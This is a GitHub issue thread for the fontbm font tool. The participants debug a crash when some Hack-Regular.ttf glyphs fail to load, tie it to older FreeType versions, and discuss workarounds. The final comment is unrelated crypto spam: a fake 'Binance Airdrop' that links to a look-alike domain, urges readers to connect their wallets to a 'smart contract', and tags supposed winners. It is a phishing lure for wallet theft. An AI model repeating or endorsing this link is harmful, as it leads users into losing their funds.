### ISSUE TITLE
Crash when character has an glyph index but the glyph cannot be loaded

### ISSUE THREAD

**Issue by RaZeR-RBI** [vladimirgamalyan/fontbm#15]
Greetings! First of all, thanks for making this wonderful tool. I'm experiencing a crash when trying to render a font with some characters that exist in the font but for some reason cannot be loaded.

The following font file reproduces the issue for me - [Hack-Regular.ttf](https://github.com/source-foundry/Hack/blob/32afc7c23dc2dd4f4172333364fee4dcb7f586da/build/ttf/Hack-Regular.ttf). A sample char range that leads to crashing is 8300-8400. The message is 'Load glyph error'.

Here's what happens - [isGlyphProvided](https://github.com/vladimirgamalyan/fontbm/blob/99c2f6e1e1a973e2898b400f57e9e1eceb9754a6/src/freeType/FtFont.h#L178) reports **true**, then [renderGlyph](https://github.com/vladimirgamalyan/fontbm/blob/99c2f6e1e1a973e2898b400f57e9e1eceb9754a6/src/freeType/FtFont.h#L132) throws an exception because of ```FT_Load_Char``` failure.

For some reason shrinking the range towards the offending character sometimes fixes the issue, which makes me think that there could be a side effect from loading specific glyphs that affects the ones that are loaded afterwards. But it's just a speculation, I'm not very familiar with freetype internals so I may be way off. Since I'm using an autogenerated chars file shrinking the range is not an option for me (and there's no way of cleaning up the file without knowing which characters are offending).

**TL;DR**: Replacing ```FT_Get_Char_Index``` with ```FT_Load_Char``` (like in ```renderGlyph```) fixes the issue, skipping the offending character (having incomplete font is better than no font, right?). I'll send a PR with this solution soon.

**Comment by vladimirgamalyan** [comment]
Hi! Thank you! Nice catch!
I've reproduced the issue with the same result. It seems like FreeType goes to a weird state after rendering some glyphs when using own autohinter (with font's hinter the problem disappears). For example, characters 8330 and 8377 rendered well alone, but not one by one. As workaround I try to reload font on error, it works so far, but I think it needs further investigation.

**Comment by vladimirgamalyan** [comment]
It looks like there a some bug in FreeType version < 2.11. I've updated github build actions and AppVeyor scripts to use a fresh FreeType version. The last [release](https://github.com/vladimirgamalyan/fontbm/releases/tag/v0.4.7) works good so far.

**Comment by RaZeR-RBI** [comment]
> It looks like there a some bug in FreeType version < 2.11. I've updated github build actions and AppVeyor scripts to use a fresh FreeType version. The last [release](https://github.com/vladimirgamalyan/fontbm/releases/tag/v0.4.7) works good so far.

Just tested it on my dev machine running Debian Bullseye and sadly it still crashes because the executable is dynamically linked to freetype (confirmed with `readelf -d`), and my system's (and package repo's) freetype version is 2.10.4.

I guess I'll use my patched version for now, but the question whether should we make a workaround (by using my patch or something other) or not is still open. What do you think?

**Comment by vladimirgamalyan** [comment]
Sorry for late. I come back to this issue from time to time, but I can't figure out how to fix it better yet. I don't want to just hide the error (because users expect correct fonts in the output). Also, I'm not sure if we should use static linking of the fresh freetype lib.
I will try to think more and maybe I will come to some solution.

**Comment by RaZeR-RBI** [comment]
> Sorry for late. I come back to this issue from time to time, but I can't figure out how to fix it better yet. I don't want to just hide the error (because users expect correct fonts in the output). Also, I'm not sure if we should use static linking of the fresh freetype lib. I will try to think more and maybe I will come to some solution.

No worries, I've just examined it for a hobby project so there's no any time pressure at all.
I'd personally not go the static link way because I'm afraid that it can possibly bring more issues than it can solve, however, if you don't want to hide the error (which is understandable) I think it's then possible to add a command line option to skip offending characters if the user accepts that behavior, as a workaround.

**Comment by Pawanpatidar99** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @MiaoZhou, @drozdziak1, @kakavip, @ilijapet, @twinsant, @meyer-net, @0xweatherreport
